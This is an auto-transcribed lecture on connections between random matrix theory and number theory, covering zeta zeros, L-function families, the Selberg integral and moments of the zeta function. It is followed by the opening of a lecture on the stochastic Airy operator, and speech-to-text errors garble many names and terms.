Achiliads, he ended up with the prime number theorem that the primes get logarithmically a little less dense as you go up. But you can compensate for that with what we now would call the von Neumann, the von Mangel function. But he observed fluctuations around the average that's given by the prime number theorem. And he sort of understood that the data pointed to a central limit theorem, although he didn't state it quite in that way. And he sort of understood that the variance was an interesting quantity of these fluctuations. And so how would we in modern notation set up this variance? Well, we to count the primes in a range of consecutive integers. So let's count them between X and X plus H. So in Gauss's experiment, capital H would be 1000. And we understand now from the theory of the zeta function explicitly from the explicit formula that the right way to count the primes is to count the primes and their powers together using the von Mangel function. And so we to estimate something like this. So in Gauss's case, capital H would be 1000. But you can think of this as sort of general variable. And the question is what's the size of this sort of sum? So in the in modern terminology, this would be counting primes in short intervals. We're not looking for the sum from n is one some very large number. We're looking from one very large number to that number plus capital H, which may also itself be large. So what would you expect for this? Well, the prime number theorem tells us that the average size of the von Mangel function is one, because I remind you the prime number theorem says that if we sum the von Mangel function from one to capital X, this is asymptotic to X. So the average size is one. So we'd expect this on average to be capital H. So that's subtract of capital H. That's what we expect it to be on average. And then ask what the variances of this quantity. We'll square it and then average with respect to the starting point. This is the variance in modern terminology that Gauss was interested in. And he had the numerical data, but he didn't frame a precise conjecture for what this was. If the primes were completely uncorrelated Poisson variables, we'd expect this to be we'd expect the variance to be the size of the mean. So we'd expect this to be H. If the primes had no co-related or uncorrelated. That turns out not to be the case. And there's a conjecture of Golston and Montgomery, but the correct answer should be it is that it should be H times the log of X over H plus some constant. And the constant is known as a precise value. This is asymptotic as capital X tends to infinity. And technically we need the range to grow with capital X, but it can grow very slowly. So X capital H has to be between X to the epsilon and X to the minus epsilon. Basically capital H has to grow more, more quickly than some small power of X could be smaller power as you like. But it can't grow more quickly than X itself. And this is the conjecture of Golston Montgomery for what the variance should be in the kind of numerical experiment that Gauss did. And the theorem is, which I won't prove for you, is that Montgomery's conjecture is equivalent to Golston Montgomery. That is, if I know the pair correlation of the zeros of the zeta function, that implies Golston Montgomery and vice versa. So this is why it's important to know about pair correlation of the zeros. This is the sort of information it gives you about the primes. So in fact, fluctuations in counting primes in short intervals, so fluctuations around the prime number theorem. Now how do you prove this? Well, you put in the explicit formula for this sum. You know what to expect now. The explicit formula will replace this sum by a sum over zeros. These are fairly localized sum, so we expect a very long sum over zeros, and since we're squaring it, we get a sum over pairs of zeros. And so the left-hand side can be written as a sum of pairs of zeros, but that's precisely what Montgomery's conjecture tells us about. So that's the philosophy here. And I should say that Hardy-Littlewood, the conjecture about pair correlation of the von Mangel function, implies Golston Montgomery. So you can derive this Golston Montgomery conjecture two ways. You can either assume Montgomery's conjecture or the Hardy-Littlewood conjecture. You get the same answer in both cases. Now let me tell you a little bit about how all this generalizes to L functions. The implication does not assume the Riemann hypothesis. It's unconditional. This implication here. No, it doesn't assume the Riemann hypothesis. It might assume it in some, I mean, yeah, I didn't specify an error term in the Hardy-Littlewood conjecture. This assumes a well-behaved error term. And I'd have to think through exactly whether the assumption on the error term was equivalent to the Riemann hypothesis. At the moment, I don't think it is, but I'm not completely sure about that. So now what about L functions? And I'll be a little schematic here. I'll give you a flavor of where the subject stands without going into too many details. Well, I told you yesterday that there are lots of L functions, infinitely many, and they fall into different classes. And one way to classify them is in terms of how many gamma functions appear in the functional equation. There are 19th century L functions like the Riemann zeta function and the Dirichlet L functions, which I introduced, have one gamma function in the functional equation. The 20th century L functions, those associated with elliptic curves or modular forms, have two gamma functions in the functional equation. And we now know that there are many others with an increasing number of gamma functions and these are being studied at the moment. And there are some other things, since many people here like special functions, you can think of these L functions as like the special functions of number theory. And there is a database of them, a little like the sort of books that we all know and love with properties of other special functions. And you can find all the L functions and modular forms database and you can find about, I think now it's about 3 million L functions with their properties tabulated, asymptotics given, etc. And plots of the first few zeros. So you find that online, so a resource that on a database that you find online. So the idea is that if you, I told you yesterday, that if you fix your L function, any L function, we expect it to have a Riemann hypothesis. And for any L function, if you look at the statistics of the zeros vertically, that is along its critical line, you get the same answer as for the Riemann zeta function. So there is the pair correlations of the zeros will be the same as those of random unitary matrices or GUE, if you prefer. And everything works out as I said yesterday, and you can prove a theorem consistent with that. And you can generalize that theorem to all k point correlations or k tuples of zeros. This is a fixed L function looking vertically in that way. And this tells us then something about the generalization of the Golfsson-Mongomery conjecture. So if you know the pair correlation of the zeros of an L function, that tells you information about the generalization of Gauss's problem where you replace the von Mangel function. By the von Mangel function associated with the L function, and that's just defined in terms of the logarithmic derivative of the L function. So there's a random variance formula that I've written at the top there. There's a generalization of that to all L functions where basically you replace the von Mangel function with the generalized von Mangel function associated with the L function in this way. And the only way we know how to approach this is then via sort of random matrix theory. So this is random matrix that is very important in this context. Another game you can play, which is not to fix your L function and then look vertically along its critical line, but rather to consider a family of L functions. So here's one, here's another L function, here's another L function. They each have their own zeros. I would lose two questions. For L functions, what's the analog of the primes? So the primes themselves, but the primes would be weighted differently. So if you remember the example that I gave you yesterday, yesterday, the Dirichlet L functions, you simply get by taking the Euler product with the primes, but you weight the primes with some function which is a character of the multiplicity group modulo d. So it is a good question. So this, in a sense, the analog of the primes are the primes, but they have these extra weights associated with them. And for example, Dirichlet introduced these so he could count primes in different arithmetic progressions. So what this character does, it picks out different arithmetic progressions. So I'm thinking schematically now, I'm thinking of taking a number of different L functions. For example, it could be this family of L functions, which is parameterized by an integer d. And so my integer d could be increasing in this direction. So this is d equals one, d equals two, d equals three, etc. These are the L functions associated with those values of d, and here's a formula for those L functions. And it was an idea of cats and sarnac in about 1998 to ask not what's the statistics of the zeros for a fixed L function vertically along its critical line. But what if we fix a height of the on the critical line and average through a family of L functions? So we average horizontally rather than vertically. So what's a sort of horizontal question? It might be what's the height of the first zero? That's a question you can ask for a given L function. For each L function, there is a height of the first zero. What's the distribution of those heights be? Or put another way, what's the probability? So it's a different question now that I have a zero within a distance, at least one zero, within distance alpha of this point here. Again, there will be a number of zeros for each L function in a range of height of size alpha measured from this point here. That number will fluctuate. What are the fluctuations? And it was realized by cats and sarnac that if we average vertically, you always get the unitary group. If you average horizontally, you can get depending on which family of L functions you take, either the unitary group, the orthogonal group, or the symplectic group. So in particular, this family of L functions, the Dirichlet L functions, these form a symplectic family. And if you take L functions associated with elliptic curves, which we have not defined for you, that would take me too far afield, you get the orthogonal group. And then the calculations that I showed you yesterday, you can reproduce in these various different settings. So you can ask for the unitary group, the orthogonal group, and the symplectic group separately, what are the correlations of the eigenvalues of matrices representing elements of those groups? You do those calculations, and then there's an analog of Montgomery's theorem for various families of L functions where your average is horizontal rather than vertical. And the finding is that the analog of Montgomery's theorem matches random matrix theory in each case, but you get different answers so that the answers are different for unitary, orthogonal, and symplectic. So you see the differences between families of L functions in the statistics of zeros near to this point, the sort of symmetry point, the reflection point of the function equation. You see differences in the statistics and those differences represent the different classical compact groups. And whilst this is again a fact, a numerical observation, the data is very extremely convincing, there are theorems consistent with this data that differentiate these groups and that express consistency for various horizontal averages with random matrix theory. Again, these theorems, like Montgomery's theorem yesterday, are a little uninsightful in that you do a calculation in number theory, it looks nothing like a calculation in random matrix theory, but lo and behold, you get the same answer. But you don't see any reason why you get the same answer, I would say that these calculations give one confirmation but little perhaps insight or little deeper philosophy as to why this is true. But that's all I want to say about this generalization other than that it exists and it's very important and it gives one a much bigger picture. But the pictures simply like for the Riemann's Eta function, you do complicated calculations, the combinatorics become very difficult, but lo and behold, you get an answer that matches an answer that has some determinant structure coming from random matrix theory, but you don't see that determinant structure or that integral structure anywhere in the number theory, it's simply a coincidence. Yes. Yes, yes, yes, yeah. Even for the low line zeroes because the density depends very slightly on D. And so as you go in this direction, the zeroes get more dense. Right. So for the horizontal average, the density of zeros goes like log of DT over 2 pi. So it increases log, if you fix T, it still increases logarithmically with D. Or even some weird, I don't know. Yeah, I mean, there are, there are, there have been numerical explorations which do allow one to explore this sort of picture in all sorts of different directions and there is an interesting story there, but that would take me a long time to tell. So vertically for any function you have, you have. Yes. Exactly. No more. So, exactly, but you know, this is all that one gets. And if I have time tomorrow, I'm not sure exactly what I'll do tomorrow depends on how much I get through today. I may tell you that there is a world in which this is a theorem. So there are everything I've told you so far about the Riemann Zeta function and the L functions concerns the special functions, the L functions certainly with integers. If you go to a more algebraic setting where you associate these L functions with polynomials defined over some finite field, then everything I've said so far is a theorem. And you can prove it all in a certain limit which I may get around to telling you about tomorrow. If not, I can answer over coffee with anyone's interested. But everything I've said so far becomes a theorem in this rather babyish setting, but there you can really identify what these groups are and these classical groups are the ones that appear. Okay, but I think what I want to do today is to move on to a different class of problems which illustrate in a different way the relationship between number theory and random matrix. And random matrix theory and that it's a very deep relationship but still somewhat mysterious. And this is the problem of moments. So rather than looking at the distribution, the statistics of the distribution of the zeros of an L function, I now want to think about the distribution of the values of the L function, which may be zero or between the zeros will be nonzero. I want to know what the probability distribution is of the values of the L function on the critical line. And in random matrix theory, the analog of this would be to look at the characteristic polynomial. So I get my unitary matrix A, I'm back in the unitary group now, and I form the characteristic polynomial determinant of I minus A e to the minus i theta, which is just product over the eigenvalues of one minus e to the i, e to the n minus theta. So you can think of this as the analog of a zeta function in that it has zeros. And the zeros of this function are the eigenphases of the matrix A. And in that sense, it's a function with interesting zeros just like the Riemann's zeta function is. So let's study its values. And the problem is to consider the moments of several problems one might want to consider the moments would be if we take the average of the modulus of the determinant to some power to beta. And in random matrix theory, this is an interesting problem, and it can be addressed in a number of ways. In particular, it can be addressed using Fisher-Hartwig asymptotics. You can write these moments in terms of turbulence determinants and so the sorts of material that you've been seeing in Estelle's lectures and Alexander's lectures become important. But I want to take a slightly different approach, which is something Alexander mentioned yesterday. So you can write these moments exactly. So I said yesterday that the average over the unitary group, this is an average with respect to harm measure and harm measure on the unitary group. There's a formula for that called the vial integration formula, which allows you to write this exactly as a multiple integral. Alexander wrote down examples of this kind of integral. So we're to get the quantity we want to average. That's the quantity here. And write it in terms of the eigenvalues. Well, here's a formula for that. So we have the product N is 1 to capital N of the modulus 1 minus e to the i beta n minus theta to the power 2 beta. That's the quantity we want to average. And the measure coming from the vial integration formula is just the van der Mond factor. So that's a formula for the quantity for the for the moments as an n fold multiple integral with a very explicit integrand. And if you do write this as a van der Mond determinant, you can analyze the problem in that way and then you're immediately led to if you want to consider the large n asymptotics. This becomes a problem of exactly the sort that Alexander and Estelle have been considering. There is a different approach. It's Alexander mentioned, which is to use the Selberg integral. So I'll do this on the board over here. So I'm sure many of you have met this integral. The Euler's beta integral is an integral of the form integral 0 to 1 t to the alpha minus 1 1 minus t to the beta minus 1 dt. And Euler famously evaluated this to be gamma of alpha gamma of beta divided by gamma of alpha plus beta. And it was a question first raised by Selberg, whether there's a multi dimensional analog of this. Selberg considered an integral of the form 0 to 1. An integral of that form. And he found that there is an answer for this, which resembles this product of ratios of gamma functions. It's an exact evaluation of this integral. And the story is rather interesting. Alexander has been talking interestingly about the history of Riemann Hilbert problems and Seigos theorem and so is Estelle. The history here is no less interesting. So Selberg, when he had this idea to look at integrals like this was a PhD student in Norway in 1941, which was a time when there was perhaps less mixing in the mathematical community than there would be now. So he wasn't aware that this had been studied before or not. And he rather suspected that this integral had been evaluated. He evaluated it in 1941 and mentioned it in the footnote of a paper. And then by about 1944, he'd searched the literature hadn't found an evaluation of this integral. He wrote a fuller, more extensive paper, but he still thought that probably this was known to experts, may even have been known to Euler. And so he buried this paper in about the most obscure way that you can. He wrote it first of all in Norwegian, which is understandable as that was his native language. But he published it in a journal for Norwegian high school teachers. And it's about the most obscure journal you could imagine. In 1944, he published the answer, which I say resembles this formula. I'll give you a special case for it in a minute. It's also the first of all, is it quality or high school education? Absolutely. Yes, yes, absolutely. Wait, tell us also about the quality, if you like, the culture of us as a mathematical community. So Selberg wrote this in 1944. And the history is rather curious. The paper wasn't cited at all in any following publication until 1979. So it went completely unnoticed. And that's perhaps understandable. Not many people would go to this journal, but Selberg was a Fields medalist in 1950. So you think you would have thought people might have looked at his early papers and dug this paper out, but it seems nobody did. And in the meantime, many people worked on this problem, a special case of this integral. So famously Dyson thought about this in the 1960s and 1970s. Maitre did. And many people thought about trying to evaluate special cases of this integral unsuccessfully without knowing that Selberg had re-evaluated the general case. It's all even more surprising that Dyson was in the same institution as Selberg and was trying to do this for at least a decade and Selberg didn't tell him he'd done it. And in 1990, and it seems he was aware of this. It seems that he was secretly enjoying the fact that this whole community of random matrix theorists was trying to evaluate these integrals, they're called the Dyson conjectures and this sort of thing, all proved in a result that was at least 20 years old by Selberg, and he didn't tell anybody until Bombieri, another Fields medalist, got interested in these multiple integrals and went to our Selberg's advice. And at that stage only then did Selberg reveal that he'd already evaluated this integral. People have been struggling for, say, nearly 20 years to do it. So there's a little insight into the psychology of various famous mathematicians. But the Selberg integral doesn't allow you to, it looks exactly like this, of course. There's some change of variables that needs to be done. I won't go through the details of that. Change of variables is not straightforward, but you can see that the structure is more or less the same. And this evaluates to be that product of ratios of gamma functions using the Selberg integral. So that's an exact evaluation, and I should emphasize that the reason why you can evaluate the Selberg integral, it's not at all clear from Selberg's writings on it, there's a very deep reason why these integrals are exactly of the kind that can be evaluated, and that's very much connected with the theory of integrable systems. So these integrals happen to be very closely related to representation theory. There's a generalization of these which makes that much clearer called the McDonald constant term identities. So there's a deep connection between root systems of lead groups and the symmetries of those root systems and the ability to evaluate integrals like this, but I won't go into that now. So you can evaluate these integrals for very deep reasons, that's the answer in this case. And if you evaluate this asymptotically now, this becomes g squared of 1 plus beta divided by g of 1 plus 2 beta, n to the power beta squared, where this is the Barnes g function that we saw yesterday in Alexander's lectures. And to remind you, the gamma function satisfies gamma of s plus 1 is s times gamma of s, and the g function satisfies g of s plus 1 is gamma of s times g of s. So it's an entire function of order 2 which generalizes the gamma function. And as Alexander emphasized, this function appears very naturally in kind of Fisher-Hartwig asymptotics, and that's no surprise, you could address this asymptotic problem using Fisher-Hartwig theory as well, and give the rest of the same answer. So we understand moments of characteristic polynomials. You can generalize the moments. So one generalization that's proved very popular in recent years is, let's say, a and b are sets of cardinality, k, then we can consider, I don't want to write this, yeah, a product of alpha in A of determinant I minus A e to the minus i theta plus alpha times a product of beta in B times the determinant of i minus A. Oh, that's bad notation, isn't it? 2a is, yeah. So let me call them c and d then. Can I have alpha and c? I suppose I can. If I take the complex conjugate of the second one, then these sort of shifted moments are of considerable importance in random matrix theory. They sort of reveal the symmetries behind the characteristic polynomial in a way that the moments don't. The moments are degenerate cases of these shifted moments when all the alphas and betas tend to zero. And one can evaluate these averages as well. And in this case, the Selberg integral doesn't help you. There isn't a Selberg integral that we know of to evaluate averages of this kind, but there are other tricks that allow you to evaluate this. So the integrable sort of structure comes in and we know how to evaluate products like this. And in the limit alpha and beta tend to zero, you recover the moment formulae. I'm mentioning this generalization because it will become important when I talk a little bit about number theory. So now, what's the number theory analog of this? Well, we've learned to expect that the average over the unitary group is like an average at the critical line. So in the case of the Riemann-Zeta function, we could get the zeta function on the critical line. We're to take the modulus of that and raise it to the power 2 beta and then average this along the critical line. And these moments for the zeta function have a long history. They go back, they were first studied by Hardy and Littlewood in 1918. And the question is, can one evaluate the asymptotics? So this is purely a problem in asymptotic analysis. There's very little number theory now. I defined the zeta function for you to sum over the integers. And so this looks like a straightforward problem in asymptotics. So we're writing beta growth, so there's no subtlety associated with that. But it turns out to be extremely difficult. And there's a long and very tortured history to this problem. So there is a general conjecture. Which I'll write in modern form is that what we expect this to be is we expect this to go asymptotically like log t to the power beta squared at leading order. And we expect there to be a pre-factor to make this a good asymptotic. And the pre-factor is expected to be a constant or a function of beta. Which is given by product over primes. So there is some function of beta, which you can write down very explicitly as a product over primes. But the problem is, it's now understood that's not correct. So this was initially thought to be correct, but it's now not thought to be correct. So the question is, what's the fudge factor that makes this a correct asymptotic? And the reason this is subtle is, well, the reason people originally missed out the fudge factor was that the theorem of Hardy and Littlewood, which is eta of beta of 1, turns out to be 1. And that's a theorem of Hardy and Littlewood in 1918. The problem became interesting was that when people calculated f zeta of 2, this turned out not to be 1. It turns out to be a 12. And this is a theorem of Ingham in 1926. So you get the projection. Yes. Yeah. So there's some function. The question is what function of beta. The definition of f of zeta is this prepactant. Exactly. No, no, no, no, no, no, no. The definition is, is what's the function, assuming it exists, which is the 2-beteth moment of the zeta function, divided by log t to the power beta squared, divided by this function of beta. Is that clear? No, it is a conjecture. One is a zero. Yeah. I don't know what this is for. I know the value of f for beta is 1 and beta equals 2. What I'm about to tell you is. It is a theorem. Exactly. I'm writing this in a rather convoluted way for a particular reason, just to tease my audience. And I'm glad that I, yeah. No, it's, first of all, I think historically it was thought that f of beta would always be 1. Because its first value was 1. Then it was realized that f of 2 is a 12. So the surprise is that's not 1. And the second surprise is that it's, if it's not 1, that it's a rational number. So there's no a prior reason to expect f of beta to be anything. If it's going to be anything, you might think it would be 1. But if it's not going to be 1, there's no reason to expect it to be a rational number at 2. And that's how I'll indicate. Tomorrow, the history then gets very murky. We don't know any other value of f of zeta rigorously. There is no further theorem on this matter. But there are conjectures. There's a conjecture. So I'm going to write a 12 as 2 over 2 squared factorial. And 1 is 1 over 1 squared factorial. So you might think, now you spot the pattern. 1, 2. Well, f zeta of 3 is conjectured to be 42 over 3 squared factorial. And this is a conjecture of Conry and Gosh in about 1990. And f zeta of 4 has been conjectured to be 24,000 and 24 divided by 4 squared factorial. And this is Conry and Gonec in about 1998. Dates are a little imprecise there. And the sort of prehistory of the subject is that you have a theorem in these two cases. You have conjectures in these two cases. So there is a method clearly that's giving rise to these numbers. But if you then apply that same method to any value of beta greater than 4, you get a negative answer. And clearly, you're trying to calculate something that's strictly non-negative. So this is leading order asymptotics that's extremely difficult. And so I'm not making fun of the people who were involved in this. This is a huge, huge, huge enterprise and a great achievement that they got this far. But it's clear that the method they were using, whatever that method is, and I'll tell you more about that tomorrow, is actually on very shaky ground. Because if you apply that exact same method for any value of beta greater than 4, you get answers that are manifestly ridiculous. So the question is, what's going on here? How does random matrix theory play a part? How does number theory play a part? How do we understand this problem of this category one error of things sort of suddenly becoming negative when they obviously have to be positive? How does this generalize? We now have a more general understanding of this asymptotics, that these moments should grow not just as log t to some power, but for the integer moments, there should be some polynomial. This is a polynomial of order beta squared. And the belief now is that the asymptotics is given by a polynomial function of log t of order beta squared, and then the remainder is exponentially small in that large variable log t. So it's a very interesting form of asymptotics where you have a finite asymptotic expansion, and then the terms beyond that become exponentially small. So I'll tell you more about this tomorrow. And what about the final product of this final product? Where did you, with how do we look at the thing going when you get the problem? Again, I'll tell you that. I'll tell you more about that tomorrow. Yeah. But crudely speaking, if you were to put in, if you were to do a completely ridiculous thing, and to try to substitute the Euler product for the zeta function in here, now this is a ridiculous thing that you would only try amongst your very closest friends. You put the Euler product in here, and you assume the primes are independent of each other. So you can interchange the average and the product over primes. You're basically led to this formula with f is one. And I think almost certainly that's what Hardy and Littlewood did when they framed the conjecture originally, but they didn't say that. And so. So can I say this degree of log independent? Exactly. Exactly. F is the, exactly. F measures correlations between the primes in a way that we've seen that random matrix theory captures. Okay, so thank you very much. We have several questions. So some further questions or comments. Can you maybe define how what characterizes a class of L functions, because there is clearly something going on with the. Yes. So is there some sort of a condition on this class that's giving rise to this? No, there is no, I would say there are many papers written on this subject, but I would say I can't distill all that information down into a bite sized piece of information. I would say I do not understand what constitutes a family of L functions in this context. So there are natural getters. So you might take all the Dirichlet L functions to be a family. You might take all twists of some elliptic curve to be a family, but there's no a priori reason why you would believe that. And what it usually boils down to is an experimental observation that you take a group of L functions, you do some calculation that's like Montgomery's conjecture, and then you find it happens to agree with random matrix theory for one of the classical groups. And then you say, aha, this is a family, and it's an orthogonal or a symplectic or a unitary family. Now that that's slightly overstating the case. There are sorts of indications that one might look for. But this I would say is still at the level of of intuition driven experimental science, not what I would call a sophisticated all embracing philosophy. So I think that's a rather significant question. Is there some relation between the distribution and the number of gamma functions, the product of gamma functions that you find out? Very good question. Yeah. So, so the the number of gamma functions does appear. I didn't emphasize this because it was taking me too far. But the, for example, the number of gamma functions that appears would appear in this formula there. So the fact that the number of gamma functions for the z function is one means there's a one there. If you were to put, if you were to look at L functions with two gamma factors, there will be a two there. So it does appear. Some other questions. And just perhaps just to say that again, the number of gamma factors appears in this picture in a very profound way. And this is the origin of a lot of its appearance. For the for L functions with one gamma factor, they all have essentially the same density of zeros. And it's given by a formula like that. So if you fix D, this gives you the density as T grows. And if you fix T, this gives you the density as D grows. If you have two gamma factors, you have twice the density of zeros. Three gamma factors means three times the density of zeros. So another way of saying how many gamma factors are there in the function equation is what's the density of zeros, what's the ratio of the density of zeros to that of the Riemann's Eta function. And it's an integer. It's there. Yeah. Okay, thank you. So any other questions? Okay. So this asymptotic description of the leading order of behaviors log T to the beta squared. Yes. Is it known that the ratio has a limit? No. So the upper and lower bounds are known in the case beta equals one and beta equals two. That's all that's known. There are there are upper bounds and lower bounds, which are consistent with this log T to the beta squared. The lower bounds, basically the upper and lower bounds agree to be something like log T to the beta squared, but it's not completely clear that what whether there's an asymptotic in there. The lower bounds both have log T to the beta squared, the lower bands are unconditional, the upper bounds depend on the Riemann hypothesis. So on the Riemann hypothesis, you would certainly believe that this is the right asymptotic, but the upper and lower bands wouldn't give you this to make it a full asymptotic. Some other questions. Maybe I have a question. So you show the average of characteristic polynomial and then you show the. Yes. Moment. I will. And then maybe I won't ask. So what about if you take GUE? It will be the same. Yes. So for the GUE, you can also analyze it in more the same way. There isn't a nice simple formula like this for a finite size GUE matrix. But if you scale your moments appropriately with the correct mean density given by the semi-circle, you do get a limit that looks like that. So in the limit of large matrix size, you get simple formula that looked like this, but you then have to, as I say, you get here basically the local density of zeros given by the semi-circle. But you need the asymptotic formula. You need the asymptotic formula. Yeah, there isn't a nice simple formula like that. Okay, so some other questions. Okay. Families of random matrices where the scaling limit in each family is the U and the design kernel. And then you can do a sort of average and get the. Yes. Yes. So a good question. So if in fact the examples I wrote down, if you take the the orthogonal or the symplectic group, the eigenvalues of matrices of orthogonal and symplectic matrices lie on the unit circle. But in these two cases, in the orthogonal and symplectic cases, they come in complex conjugate pairs. So the eigenvalues of the form e to the plus or minus i theta n. So there are symmetry points in the spectrum. There's a symmetry point here. And there's one here and the eigenvalues come symmetrically distributed around those points. If you look at the statistics of the eigenvalues close to these symmetry points, for example, you ask how far is the first eigenvalue from that symmetry point. You get a different answer in either the orthogonal, symplectic or unitary cases. But if you ask questions about the statistics of the eigenvalue, local statistics far from the symmetry point, for example, what's the pair correlation of the eigenvalues at this point up here, then there is always unitary. So basically, for local statistics, if you're far from the symmetry point, you can't see the symmetry point. Did I answer your question? Okay, so any other questions? Okay, so let's thank John for his lecture.
I will give an overview of connections between Random Matrix Theory and Number Theory, in particular connections with the theory of the Riemann zeta-function and zeta functions defined in function fields. I will then discuss recent developments in which integrability plays an important role. These include the statistics of extreme values and connections with the theory of log-correlated Gaussian fields.
10.5446/54165 (DOI)
Okay, thanks a bunch. Okay, so yesterday I just tried to alert you to the existence of this stochastic area operator and then show you if you believe it existed, we could, you know, we could express all the characteristics of the data laws in terms of the hitting probability of a simple diffusion, a simple random ODE. At the very end, I was showing that you can actually use these things to get some quantitative information for those in the audience that like formulas, right? We can get some formulas. You know, for one of the bounds, which is a cheap test function in the variational principle, for the other bound, the lower bound that I didn't get to, you have to use the Riccati diffusion. That's a more flexible object. So those slides are online. So I won't go back there. I'll just forge ahead. So today what I want to do is actually try to prove for you. There we go. So you know, show that the stochastic area operator really makes sense, right? I think that it really has discrete spectrum, or at least give you an idea of how the proofs go and then show that, honest to God, these beta-hermet matrix models, which you'll remember, are these guys with normalized gaussians on the diagonal and these descending sequence of chi's, normalized in the same way on the off diagonal. And then if you take that tri-diagonal matrix model and scale it the way you scale tracie widem, that in some operator sense, which will be made really precise soon, that you really have convergence to this stochastic area operator, and then to hopefully get to some payoffs for other ensembles, and you can get away from this beta-hermet thing. Okay? All right. So now, I already kind of advertised that we're going to really understand the stochastic area operator through its quadratic form, and the tracie widem beta law, the negative tracie widem beta law, will be defined as the ground state eigenvalue for that operator, which means it'll be the infimum of this quadratic form, right, with this sort of nice positive density that's h1 norm plus a moment, and now this random quantity, right, the stochastic integral. And you've got to minimize or take the inf over all f satisfying these conditions, Dirichlet boundary conditions, just normalize L2, then you want the good part of the energy to be finite, all right? That's your out. I want to show you this thing makes sense. And I did mention yesterday that, you know, just a stupid integration by parts doesn't work. On the other hand, all you can do is integrate by parts. So you want to beat this db, which is a bad object. This means you have to integrate by parts in a slightly more clever way. And the idea is the following, you know, which, you know, we had lots of ridiculous ideas along the way, but what gets the optimal result is the following point of view. You know, the infitestimal of a Brownian path is hard to deal with, but if you could replace the db with a delta b with a real increment, that's a much tamer object, all right? So this is actually what you do is you just, I always push the wrong button. So you take your Brownian path and you decompose it as it's running average plus the error. So b bar is just a little average of the Brownian path starting at x, the integral from x to x plus one of the Brownian path. There's nothing holy about choosing one, right? Just a little running integral of Brownian motion. And then you just write the Brownian motion, which you're going to stick into this stochastic integral as its average minus the error you made because you don't actually have the average, right? And then you write out what you get. So this is just notation for this stochastic integral. I'm thinking of the white noise, if you like, as a multiplication operator, hit it against stuff, hit it against stuff on the other side and integrate, okay? So if you follow this through, you have this object, right? Which is what? Which is really the derivative of the average is simply Brownian motion at x plus one minus Brownian motion of x. And that's what you're trying to accomplish. I'm trying to replace delta b, db with delta b. There's your delta b, okay? If you stop there, life would be great, but you can stop there because that's not what you have. So this is the error to that. And that error you integrate by parts, all right? So this is, you know, this is an absolute equality, almost sheer equality, for at least again for f smooth and compact support, all right? And we use this idea and we get this random inequality that works for all functions, that holds for all functions in that Sobolov space, l. All functions that are in h1 plus a moment. So here's how it reads. You pick any little constant you like. See, I'm going to use little letters for deterministic numbers and big letters for random numbers, all right? So you pick any little constant you see you want and I can bound this stochastic integral by this kind of Sobolov norm plus a random constant times the l2 norm. Now this random constant, I mean, I don't have much control over it. It depends on the C you choose. It depends on the Brownian path in some way. I don't know. But it's almost surely finite. Okay? And this is how it works. So again, you do this trick, you know, you try to replace the db with a delta b by replacing Brownian motion with its average. And then what you use, the reason just integrating by parts in the most immediate way doesn't work is because at some point you have a Brownian motion square, you try to hide it under the potential for stochastic area that's just linear, right? The square Brownian motion grows faster than x, right? But an increment of Brownian motion grows very slowly. The increment of Brownian motion as a process only grows logarithmically. So here's a little, here's a little exercise. It means ugly to unfold, but check out what's happening. If I take Brownian motion, a little increment of Brownian motion, you know, Brownian motion of x, subtracted off of Brownian motion of x plus y, and even if I soup over all y in a finite range up to 1, and then I soup over all x for all time, that this thing only grows logarithmically, in fact, a square root of log, right? So this random object is bounded by a constant, it's a random constant, right? So it's almost surely bounded. That Cb is almost surely finite, right? And this, well, it's like a log, a literated log for this difference, right? That's exactly the problem. If you just, if you didn't have the difference, if you just had Brownian motion, right, on the bottom you would have x log log x, and that's too much for us. But if you replace the Brownian motion with its increment, then this only grows logarithmically. You lose the polynomial power, okay? And so, you know, this thing, the derivative, yes, of B bar is exactly what? Well, it's exactly such an object. So this thing only grows like log, a random constant times log, yes? And you can certainly fit that under x, okay? And then you can short this object, and you have an f prime squared, which you can fit under this, and then you get another f squared times this object squared. But this also grows only logarithmically, so you can fit him under x, too. All right, this is the idea. And to prove this, all you need to know, you don't need to know anything about Brownian motion, you know, before today. If I just tell you the Brownian motion is independent homogeneous increments, so every increment of Brownian motion looks the same, and in fact it has, and it's Gaussian, it has a Gaussian distribution, and, you know, okay, you got to look up something on Wikipedia. The probability that a super Brownian motion on a short interval also has Gaussian tails. Those two ingredients will give you this little lemma, and then it will give you this inequality, which first you prove for smooth functions of compact support, and then you take limits. This holds for all functions of the class you want. And what does that mean? What's the payoff here? All right, let's just throw in some notation. So we have this space of functions that we're trying to identify, you know, define this quadratic form over. Can. Can you say a little bit about this, this statement comes by very rapidly, because people that are not probable, as you look back a slide. I can. So there's a C of B less than infinity almost, sure. Yeah, with probability, so you give me, you pick any C you want to put here, any little C, you know, 10 to the minus 23rd, right? And there is a random variable, it depends on the Brownian path, and it depends on the C you pick, but omega by omega it's finite. We probably want it to find a random variable. So this is like a subloven equality type thing, but the constant. It is not uniformly bounded. It is not uniformly bounded. For each realization of the random process. It's, it's whatever. Could be enormous. And it almost surely is. Yeah, absolutely. Right. Okay. But it's really kind of the best one can hope for, and you'll see it's all, it's all we need. Does that make sense though? So here's the, I mean, here's kind of the point of this whole philosophy, this random operator thing is you can't, you can't compute correlations, you can't compute any distributions, right? So you have to argue path by path, right? So you get a new constant for each path, for each Brownian path, each realization of the noise in your random operator, you know, you get a different bound. As long as those bounds are finite, right? You can argue path by path. If that makes, that helps. Okay. So let's, I'm just gonna, this is a norm squared on this space. Remember, you're gonna, in stochastic area you have a gradient squared and then you have a little first moment. So I'm just defining the natural Hilbert space that goes with that and putting a norm on that. So you have a random square norm on L and here's what that random inequality allows you to show. Again, more big C's, right? For any little C, you have bounds above and below by your, of your quadratic form associated with stochastic area. You can bound it by a random constant times this norm, right? And below by a small random constant times the norm minus some huge, possibly huge random constant just times the L2 norm, right? By sticking in that thing from before, right? But bounding below, right? If you like, you know, you have this thing and what you want, let's go back to, maybe I should do this. What I need is, I need a lower bound on this thing. How bad it can be negative. And the worst it can be negative is maybe one half times this, right? Plus a huge random constant times L2 and then you feed this in here. So you have bounds above and below on your quadratic form, right? Random bounds above and below. Okay. And once you have this, now you're off to the races. Now you do the things, you know, when you look up a classical book on variational principles. I want to extract an eigenvalue, eigenfunction out of this quadratic form. So you pick a minimizing sequence, right? So you can argue there's, this quadratic form has, you know, the associated, the operator associated with this quadratic form has a ground state eigenvector and it's corresponding eigenvalue in the following way. Do you care if the left hand side is negative? Oh, not at all. Not at all. Not at all. Right? Stuck, I mean, right. Tracy Whidham takes negative values, right? The random variable takes negative values. So you can, this thing should be able to say, and it has an infinitely long tail, right? So it should be able to take negative values. Absolutely, right? But okay. So take a, take a minimizing sequence, right? You're taking an infimum, there is a minimizing sequence, right? That converges to whatever 